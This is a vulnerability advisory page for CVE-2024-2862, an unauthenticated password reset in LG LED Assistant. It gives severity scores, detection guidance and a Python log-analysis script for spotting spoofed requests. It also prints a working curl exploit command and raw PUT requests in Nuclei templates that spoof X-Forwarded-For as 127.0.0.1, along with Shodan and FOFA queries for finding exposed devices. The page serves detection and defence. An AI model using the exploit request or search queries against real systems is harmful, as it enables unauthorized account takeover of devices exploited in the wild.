CVE-2024-2862
Published: 2024-03-25
CVE-2024-2862: This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.
Priority: P1 · 91 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 51.28% (98.8th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | lg_led_assistant | — | — |
| lg_electronics | lg_led_assistant | — | — |
Detection & IOCs (extracted from sources)
command:
curl -k -X PUT -H 'X-Forwarded-For:127.0.0.1' -d 'newPw=Password@123&hostName=hostName&to=to&user=user&from=from' 'https://:8787/api/changePw'
Detection template (Nuclei format, as given on the source page):

```yaml
id: CVE-2024-2862
info:
  name: LG LED Assistant - Unauthenticated Password Reset
  author: beginee
  severity: high
http:
  - raw:
      - |
        PUT /api/changePw HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1
        User-Agent: test
        Content-Type: application/x-www-form-urlencoded

        newPw={{new_password}}&hostName={{hostname}}&to=to&user={{username}}&from=from
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"resCode\":\"SUCCESS\"}")'
          - 'status_code == 200'
        condition: and
```

- Detect PUT requests to /api/changePw with an X-Forwarded-For header value of 127.0.0.1 — this is the attacker's method to spoof localhost and trigger the unauthenticated password reset.
- A successful exploit returns the JSON response body {"resCode":"SUCC"} or {"resCode":"SUCCESS"} — monitor HTTP responses on port 8787 for these strings following PUT /api/changePw requests.
- Use Shodan query 'http.title:"LG LED Assistant"' or FOFA icon_hash '195291629' to identify exposed LG LED Assistant instances on the internet.
- The vulnerable logic resides in Common.js — endpoint /api/changePw — monitor for unauthenticated PUT requests to this path on the application server.
- At time of advisory publication, no vendor patch or mitigation was available for LG LED Assistant v2.1.65.
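The detection hints above amount to one rule: a PUT to /api/changePw whose X-Forwarded-For header claims 127.0.0.1 while the TCP peer is not loopback is a spoofing attempt. The following script is an added example, not code from the source page or from LG, that applies that rule to access-log lines. It assumes a constructed reverse-proxy log format that records the real peer address, the request line, the response status and the X-Forwarded-For header (the `xff="..."` field); real deployments must adapt `LOG_RE` to their own log format. The sample log lines are constructed and use RFC 5737 documentation addresses.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Assumed log format (constructed for this example): one line per request,
# e.g.  203.0.113.7 - - [25/Mar/2024:10:14:02 +0000] "PUT /api/changePw HTTP/1.1" 200 21 xff="127.0.0.1"
LOG_RE = re.compile(
    r'^(?P<remote>\S+) - - \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ xff="(?P<xff>[^"]*)"$'
)

TARGET_PATH = "/api/changePw"       # endpoint named in the advisory
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


@dataclass
class Finding:
    severity: str   # "high" = XFF spoofing pattern, "medium" = remote peer on a localhost-only endpoint
    remote: str     # real TCP peer address from the log
    xff: str        # X-Forwarded-For header as logged ("-" when absent)
    status: int     # HTTP response status
    reason: str


def is_loopback(addr: str) -> bool:
    """True for loopback addresses, including the whole 127.0.0.0/8 range."""
    addr = addr.strip()
    return addr in LOOPBACK or addr.startswith("127.")


def analyze_line(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious password-reset request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None                                   # unparsable line: not our format
    if m["method"] != "PUT" or m["path"].split("?", 1)[0] != TARGET_PATH:
        return None                                   # not the password-reset endpoint
    remote, xff, status = m["remote"], m["xff"], int(m["status"])
    # The first XFF hop is the client-supplied value; a proxy appends the real peer after it.
    first_hop = xff.split(",")[0] if xff and xff != "-" else ""
    if is_loopback(remote):
        return None                                   # genuinely local: the intended case
    if is_loopback(first_hop):
        severity = "high"
        reason = "X-Forwarded-For claims loopback but TCP peer is remote (header spoofing)"
    else:
        severity = "medium"
        reason = "password-reset endpoint reached from a non-loopback peer"
    if status == 200:
        reason += "; server answered 200, inspect body for resCode SUCCESS/SUCC"
    return Finding(severity, remote, xff, status, reason)


def analyze(lines: Iterable[str]) -> List[Finding]:
    """Run analyze_line over a log and keep only the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


# Constructed sample log: one spoofed reset, one benign request, one genuinely
# local reset, and one remote attempt that the server rejected.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Mar/2024:10:14:02 +0000] "PUT /api/changePw HTTP/1.1" 200 21 xff="127.0.0.1"',
    '198.51.100.9 - - [25/Mar/2024:10:14:05 +0000] "GET /api/status HTTP/1.1" 200 88 xff="-"',
    '127.0.0.1 - - [25/Mar/2024:10:15:00 +0000] "PUT /api/changePw HTTP/1.1" 200 21 xff="-"',
    '203.0.113.7 - - [25/Mar/2024:10:16:30 +0000] "PUT /api/changePw HTTP/1.1" 403 0 xff="-"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f.severity}] peer={f.remote} xff={f.xff} status={f.status}: {f.reason}")
```

The high-severity branch is the one that matters for this CVE: the application trusts a client-controlled header to decide whether a request is local, so the defensible signal is the mismatch between the header and the socket peer. The medium branch simply surfaces any remote traffic to an endpoint that should only ever be reached from the host itself.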
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| VulnCheck | — | 9.1 | CRITICAL | — |
GHSA
GHSA-59gg-h898-v8m7 (ghsa_unreviewed · 2024-03-25)
CVE-2024-2862 [CRITICAL] CWE-287
This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.
VulnCheck
CVE-2024-2862 [CRITICAL] LG lg_led_assistant Improper Authentication (vulncheck · 2024 · CVSS 9.1)
This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.
Affected: LG lg_led_assistant
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2024-2862
No detection rules found.
Nuclei
CVE-2024-2862 [CRITICAL] LG LED Assistant - Unauthenticated Password Reset (nuclei · CVSS 9.8)
The /api/changePw endpoint in LG LED Assistant allows unauthenticated password resets when requests are considered to come from localhost. An attacker can spoof the X-Forwarded-For header with value 127.0.0.1 to trigger the behavior and receive a success response.
Template:

```yaml
id: CVE-2024-2862
info:
  name: LG LED Assistant - Unauthenticated Password Reset
  author: beginee
  severity: high
  description: |
    The /api/changePw endpoint in LG LED Assistant allows unauthenticated password resets when requests are considered to come from localhost. An attacker can spoof the X-Forwarded-For header with value 127.0.0.1 to trigger the behavior and receive a success response.
  impact: |
    Attackers can reset passwords of anonymous users, potentially leading
```